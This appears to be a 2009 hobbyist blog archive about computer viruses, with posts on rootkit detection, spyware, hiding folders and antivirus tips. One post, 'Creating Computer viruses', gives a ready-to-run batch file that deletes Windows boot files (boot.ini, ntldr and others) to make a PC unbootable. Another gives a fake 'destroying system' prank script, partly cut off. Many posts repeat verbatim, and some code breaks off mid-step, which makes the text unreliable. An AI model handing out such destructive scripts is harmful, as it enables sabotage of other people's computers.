The blog contains information about different types of viruses and properties of viruses.
Monday, July 27, 2009
RootkitRevealer
Now its time to look in to the software section. Let us see about a small software called RootkitReaveler. The software doesn't need to be installed, just double click on the icon and just agree the term and conditions, the software is ready to use. It is designed to run on Windows NT or higher editions of Windows. RootkitRevealer is an advanced rootkit detection utility and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.RootkitRevealer is capable of detecting many persistent rootkits including AFX, Vanquish and HackerDefender. RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys. Since persistent rootkits work by changing API results so that a system view using APIs differs from the actual view in storage, RootkitRevealer compares the results of a system scan at the highest level with that at the lowest level. The highest level is the Windows API and the lowest level is the raw contents of a file system volume or Registry hive. A hive file is the Registry's on-disk storage format. Thus, rootkits, whether user mode or kernel mode, that manipulate the Windows API or native API to remove their presence from a directory listing, for example, will be seen by RootkitRevealer as a discrepancy between the information returned by the Windows API and that seen in the raw scan of a FAT or NTFS volume's file system structures. You can download it from http://filehippo.com/download_rootkit_revealer/tech/
Saturday, July 25, 2009
How to create an invisible folder
You may have the private details in your computer and you don't like your friends accessing them. There are software available in the market for protecting your folder by using a password. In such cases you may get troubled if the password is lost. There is also an another way to hide the folders from your friends. This is a common technique used to create an invisible folders.The advantage of this method is that you need no software for that. Follow the steps given below:
1. Select the folder you want to make invisible.
2. Press F2 or right click on the folder and choose rename.
3. Press and hold the alt key and enter 255 using the number pad (press the Num Lock key and enter 255 using the number pad in the Right Hand Side) and then release the alt key.
4. Press enter. Now the folder appears to be a nameless folder.
5. Now what is the next step ? Yes, that's it, making the icon invisible. For that right click on the folder and select the properties.
6. Select the customize tab and click on the change icon button.
7. Now a new window containing several icons appear. Select a invisible icon from the window and then press OK button of the two opened windows. Now the invisible folder is ready.
You can use this to have fun on you friends by hiding the folders in their computers.
1. Select the folder you want to make invisible.
2. Press F2 or right click on the folder and choose rename.
3. Press and hold the alt key and enter 255 using the number pad (press the Num Lock key and enter 255 using the number pad in the Right Hand Side) and then release the alt key.
4. Press enter. Now the folder appears to be a nameless folder.
5. Now what is the next step ? Yes, that's it, making the icon invisible. For that right click on the folder and select the properties.
6. Select the customize tab and click on the change icon button.
7. Now a new window containing several icons appear. Select a invisible icon from the window and then press OK button of the two opened windows. Now the invisible folder is ready.
You can use this to have fun on you friends by hiding the folders in their computers.
Friday, July 24, 2009
Google trying to put an end to computer virus....
After the release of the Operating System Google is trying to put an end to the computer virus. The engineering experts is studying the flaws in the existing Operating Systems and the measures to overcome the limitation. If the Google's venture is realized, then it would mark the beginning of a new era in the cyber world. It has been learnt that Linus Upson, Google's Engineering Director, has promised the company is: "Completely redesigning the underlying security architecture of the OS so users don't have to deal with viruses, malware and security updates. It should just work." The dominance of Google among the competitors increases the chance for the success. The Google's policy of the Open Source also add support this argument. But in the history, the release of the Operating System Windows NT threatened several antivirus firms since there was a rumor that all the security flaws of the previous versions of Windows has been solved and no virus can harm the computer running on Windows NT, but the result was against the rumor. There are several challenges before the Google. The web browser Chrome has been reported security flaws and two of them had already solved. We can expect an Operating System free from viruses and malware at free of cost.
Wednesday, July 22, 2009
Spyware (Part - 3)
Let us see what are the medium through which a spyware infects computer. A spyware in a computer do not try to infect other computers like virus or worms or trojans. It just collects the user details and send to a particular person or firm via internet. Spywares usually get installed in the computer without the knowledge of the user. The spyware usually comes with a useful software. When the user installs the software without knowing that the software contains spyware, the spyware gets installed in to the computer and sends the details about the user stored in the computer. This is against the privacy in using internet. The manufacturer usually presents the spyware as a useful software. The common categories of the software include themes, games, internet utilities such as download accelerators, web boosters etc. Many Internet users were introduced to spyware in 1999, when a popular freeware game called "Elf Bowling" came bundled with tracking software. The cookie is a well-known mechanism for storing information about an internet user on their own computer. If a website stores information about you in a cookie that you don't know about, the cookie can be considered a form of spyware.
Another way of installing is by using the vulnerabilities in the security software provided to block this spyware. This is by making the user to click on a link that is disguised as a pop up asking any thing that makes the user click on the pop-up. that triggers the installing of the spyware. In a few cases, a worm or virus has delivered a spyware payload. Some attackers used the Spybot worm to install spyware that put pornographic pop-ups on the infected system's screen.By directing traffic to ads set up to channel funds to the spyware authors, they profit personally.
Another way of installing is by using the vulnerabilities in the security software provided to block this spyware. This is by making the user to click on a link that is disguised as a pop up asking any thing that makes the user click on the pop-up. that triggers the installing of the spyware. In a few cases, a worm or virus has delivered a spyware payload. Some attackers used the Spybot worm to install spyware that put pornographic pop-ups on the infected system's screen.By directing traffic to ads set up to channel funds to the spyware authors, they profit personally.
Tuesday, July 21, 2009
Creating Computer viruses
In this post I will say how to create some more dangerous application. Activating this will shut down the computer after deleting the files required for booting and not boot during restart. So handle with care otherwise it will end up in the permanent crash. Please do not use this to harm others. I found it from Garena.com.
Open a notepad and type the following and save it as "filename.bat" file.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open a notepad and type the following and save it as "filename.bat" file.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
How to make a Virus for fun
While I was searching for latest information about the computer viruses in the internet, I came across a site that tells how to make a simple virus for fun. Its link is: http://ardiansyahputra.wordpress.com/2008/08/23/create-a-harmless-virus-in-notepad-cara-membuat-virus-jinak-di-notepad/
I have put it for you. It can be edited according to your wish. However I didn't edited as it is his work. Please do not use this for any malpractices.
Step 1.
Open a notepad
Step 2.
Type the following codes in the notepad.
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………! properties -> options -> full screen
Step 4 is not necessary. But it will magnify the effect.
Step 5.
Yes, that is the only step remaining -activate it by double clicking on the icon.
To deactivate To Abort virus Click so that your PC is not shutdown: START – RUN and type command: shutdown -a before remaining time is over.
look at the fig. below
I have put it for you. It can be edited according to your wish. However I didn't edited as it is his work. Please do not use this for any malpractices.
Step 1.
Open a notepad
Step 2.
Type the following codes in the notepad.
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
Step 4 is not necessary. But it will magnify the effect.
Step 5.
Yes, that is the only step remaining -activate it by double clicking on the icon.
To deactivate To Abort virus Click so that your PC is not
look at the fig. below
Monday, July 20, 2009
Spyware (Part - 2)
Now let us look in to a small history of the Spyware. I have searched several sites for getting the history of Spyware. The Wikipedia provides good and clear information on the history of the Spyware. I have extracted some part of the history of the Spyware here just for you. The first known use of the word Spyware was in October 16, 1995 and it was against Microsoft Business Model. Spyware was first considered as a hardware meant for the espionage purposes. In the early 2000, the founder of the Zone labs, Gregor Freund, used the term spyware during the release of the ZoneAlarm Firewall. Since then the term is used in its present sense. As of 2006, spyware has become one of the prominent security threats to computers using Microsoft Windows operating systems. Computers using Internet Explorer (IE) is the primary browser are particularly vulnerable to such attacks. It not only because IE is the most widely-used browser, but because its tight integration with Windows allows spyware access to crucial parts of the operating system.
Before Internet Explorer 7 was released, the browser would display a message showing that activex must be installed to view a particular section of the website or the whole website. But in most cases the spyware will be in disguised as activex. The combination of user naiveté towards malware and the assumption by Internet Explorer that all ActiveX components are benign, led, in part, to the massive spread of spyware. Many spyware components would also make use of exploits in Javascript, Internet Explorer and Windows to install without user knowledge or permission. After installtion, sometimes windows pop-up warning messages about the presence of the Spyware in the Computer.
The Windows Registry contains multiple sections that by modifying keys values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically will link itself from each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted even if some (or most) of the registry links are removed.
Before Internet Explorer 7 was released, the browser would display a message showing that activex must be installed to view a particular section of the website or the whole website. But in most cases the spyware will be in disguised as activex. The combination of user naiveté towards malware and the assumption by Internet Explorer that all ActiveX components are benign, led, in part, to the massive spread of spyware. Many spyware components would also make use of exploits in Javascript, Internet Explorer and Windows to install without user knowledge or permission. After installtion, sometimes windows pop-up warning messages about the presence of the Spyware in the Computer.
The Windows Registry contains multiple sections that by modifying keys values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically will link itself from each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted even if some (or most) of the registry links are removed.
How to keep your PC virus free
You may be wondered that is there any way to keep the PC from the virus infection. Here are some tips to keep the PC from the viruses:
For keeping the PC from the computer viruses and other malicious applications we need mainly three softwares:
1. Anti-virus
2. Anti Malware Software
3. Rootkit Remover
Now let us see why we have to use these software. Let us took the case of the anti-virus . As you know anti-virus is used to find and destroy the virus. Knowing this most computer users install anti-virus. But many of the people using the anti-virus are not updating the anti-virus properly. This may put your PC in trouble. The anti-virus has generally two parts: 1. virus signature database and 2. anti-virus engine. Each virus has its own signature as a person has his own signature. The virus signature is nothing but a series of codes that is placed in every file it infect. This code is unique for that particular virus. So by simply comparing the virus signature with the data of a file it is easier to detect the presence of the virus. Since more and more viruses are released in to the cyber space daily, the anti-virus firms discovers the virus signatures of the new virus and put the virus signatures in the internet for the user to download. When we update the anti-virus, these signatures are downloaded in to the database of the anti-virus, and anti-virus gains the capability to detect the new viruses. The anti-virus engine compares the virus signature in the virus signature database with the data of the files. If a match is found, the file will be treated as an infected file and took the measures to prevent further infection and deletion of the virus and the recovery of the original file. It also scans memory for the presence of the virus.
The usage of the anti-virus will not guarantee the protection of the PC from all the malicious software. For that purpose we have to use the anti-malware software. Malware Bytes is one of the most common anti-malware software used internationally. The anti-malware software scan the memory as well as the storage device of the PC for the malicious software. This software can effectively remove almost all the malicious softwares in the PC. But there are some malware application that survive this anti malware software. We can use the rootkit remover software for removing that type of applications. Rootkits are capable of killing and hiding different processes running in the Operating System. Some softwares like demon tools use rootkits, but are not malicious software. Rootkit revealer is a rootkit remover tool used today.
These softwares are not enough to keep your PC from all attacks, if you have an internet connection. You must use a firewall to regulate the internet usage by the applications and to prevent the unwanted packets from entering in to the PC. I prefer Sygate Firewall than the windows firewall since it allows to block the unwanted applications from accessing the internet. But do not use more than one firewall for a PC since the firewalls works on its own set of rules and may clash if more than one firewall is used.
Always use the firefox 3.5 browser for more security. The add-ons must be downloaded if it is marked as recommended. Do not install add-on from the third party whom you do not trust.
Always download the softwares from the trusted sites like filehippo,cnet,brothersoft etc. Try to avoid downloading the softwares from the unfamiliar sites. I believe that these tips will help you to keep your PC clean.
For keeping the PC from the computer viruses and other malicious applications we need mainly three softwares:
1. Anti-virus
2. Anti Malware Software
3. Rootkit Remover
Now let us see why we have to use these software. Let us took the case of the anti-virus . As you know anti-virus is used to find and destroy the virus. Knowing this most computer users install anti-virus. But many of the people using the anti-virus are not updating the anti-virus properly. This may put your PC in trouble. The anti-virus has generally two parts: 1. virus signature database and 2. anti-virus engine. Each virus has its own signature as a person has his own signature. The virus signature is nothing but a series of codes that is placed in every file it infect. This code is unique for that particular virus. So by simply comparing the virus signature with the data of a file it is easier to detect the presence of the virus. Since more and more viruses are released in to the cyber space daily, the anti-virus firms discovers the virus signatures of the new virus and put the virus signatures in the internet for the user to download. When we update the anti-virus, these signatures are downloaded in to the database of the anti-virus, and anti-virus gains the capability to detect the new viruses. The anti-virus engine compares the virus signature in the virus signature database with the data of the files. If a match is found, the file will be treated as an infected file and took the measures to prevent further infection and deletion of the virus and the recovery of the original file. It also scans memory for the presence of the virus.
The usage of the anti-virus will not guarantee the protection of the PC from all the malicious software. For that purpose we have to use the anti-malware software. Malware Bytes is one of the most common anti-malware software used internationally. The anti-malware software scan the memory as well as the storage device of the PC for the malicious software. This software can effectively remove almost all the malicious softwares in the PC. But there are some malware application that survive this anti malware software. We can use the rootkit remover software for removing that type of applications. Rootkits are capable of killing and hiding different processes running in the Operating System. Some softwares like demon tools use rootkits, but are not malicious software. Rootkit revealer is a rootkit remover tool used today.
These softwares are not enough to keep your PC from all attacks, if you have an internet connection. You must use a firewall to regulate the internet usage by the applications and to prevent the unwanted packets from entering in to the PC. I prefer Sygate Firewall than the windows firewall since it allows to block the unwanted applications from accessing the internet. But do not use more than one firewall for a PC since the firewalls works on its own set of rules and may clash if more than one firewall is used.
Always use the firefox 3.5 browser for more security. The add-ons must be downloaded if it is marked as recommended. Do not install add-on from the third party whom you do not trust.
Always download the softwares from the trusted sites like filehippo,cnet,brothersoft etc. Try to avoid downloading the softwares from the unfamiliar sites. I believe that these tips will help you to keep your PC clean.
Subscribe to:
Posts (Atom)